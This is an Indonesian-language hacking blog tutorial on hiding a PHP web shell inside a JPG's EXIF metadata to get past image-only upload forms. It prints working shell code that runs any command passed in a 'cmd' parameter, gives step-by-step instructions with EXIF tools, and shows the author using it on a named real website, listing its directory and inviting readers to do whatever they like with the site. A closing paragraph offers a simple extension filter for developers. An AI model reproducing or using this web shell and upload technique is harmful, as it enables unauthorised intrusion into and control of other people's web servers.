Holaa sobat setia yuzanotes dimanapun berada,
gmna kabarnya hari ini, semoga sehat selalu ya.
Seperti pada judul kali ini gw mo mbahas trik lama, namun msih belum banyak yang tau.
Oke langsung saja ke pokok permasalahan.
Pernah nggak sih agan ketemu dengan form file upload, tapi hanya memperbolehkan file image only? pasti pernah kan, kebanyakan orang mungkin make teknik tamper data atau bisa juga make live http header, tapi cara ini tidak 100% work.
Nah pada tutor kali ini gw mw share cara manipulasi backdoor ke file jpg,
ya walaupun dengan cara ini tidak mnjamin 100% backdoor akan terupload juga :'v , setidaknya nambah wawasan agan-sista pembaca dsini, mengenai method upload shell backdoor ^_^
PERSIAPAN :
1. Target
2. Niat
Windows :
- Quick EXIF Editor ( download disini ; pass: yuzan0tes )
- Exif Pilot
NOTE : pada tutorial ini gw make Quick EXIF Editor
Linux :
- Exif (apt-get install exif)
- Exiv2 (apt-get install exiv2)
- Jhead (apt-get install jhead)
NOTE : install salah satu saja, pada tutorial kali ini gw make jhead (jpg only)
Code PHP Inject
Plain Text
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1>
<?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo 'HELLO WORLD
';}__halt_compiler();?></h1>
With Image
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1>
<?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="LINK GAMBAR" border=0>
';}__halt_compiler();?></h1>
LANGKAH-LANGKAH MANIPULASI :
WINDOWS
1. Download toolnya dulu (diatas)Penampakan tool
3. Buka toolnya, klik "Open" lalu pilih gambarnya
4. Klik tanda +
Klik "Yes" sadjha :'''v
Cara cek code php inject sudah masuk atau belum
1. Open with text editor, gw make notepad++
2. Nah kalo udah kek gini brarti sudah ke inject ^_^
Tes di localhost
1. Nah bisaa kan :'''v
LINUX
1. jhead -h = bwat lihat command dasarnya2. Siapkan gambarnya (.jpg) *cari di gugel njing :'''v
4. Sekarang kita sisipkan file php dengan command: jhead -ce filemu.jpg
Seteleh itu akan muncul default text editor VI
Masukkan salah satu Code PHP Inject yg sudah gw sediain di atas
Screenshot:
Setelah itu save. Jika sukses, muncul "Modified: filemu.jpg"
Klo result begini berarti sukses
*Ingat cara ini tidak 100% bisa
EKSEKUSI TARGET :
1. Gw dah punya live target,
Screenshot:
Screenshot:
Screenshot:
crooots.. file uploaded yeah :''v
Screenshot:
Screenshot:
1. Cara melihat isi direktori supaya bisa tersusun rapi, seperti ini:
view-source:http://www.wtinntal.at/import/mia.php?cmd=ls -la
3. Setelah itu terserah mau diapain itu web :)
CATATAN :
Gunakan command sesuai os server yg di pakai webnya, kalo linux make command linux kalo windows ya windows :'''v
intinya hanya perlu menjalankan command: SITE.COM/filemu.php?cmd=PERINTAH
?cmd= > Harus diawali dengan ini
PERINTAH > Sesuaikan dengan os yg dipakai server, pelajari command" dasarnya juga *Cari referensi di google
Bagi yang pengen langsung jadi / gak mau repot, ini file jpg yang sudah di inject php script bisa di download disini
Cara Menghindari Trik ini Untuk Web Developer
Inti dari trik ini adalah memanipulasi file php menjadi jpg (image/gambar)jika agan developer salah satu web, agan hanya perlu menambahkan filter exstensi saja,
jadi, kurang lebih seperti ini :
*sesuaikan dengan keperluan di web agan, d bwah ini hanya .jpg, .jpeg, .png & .gif
[// Code Filter extensi by m1x
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
echo "Maaf bosq, hanya .jpg, .jpeg, .png & .gif files saja yang diperbolehkan.";
$uploadOk = 0;
}]
Sampe sini dulu tutor hari ini,
Semoga Bermanfaat ^_^
No comments:
Post a Comment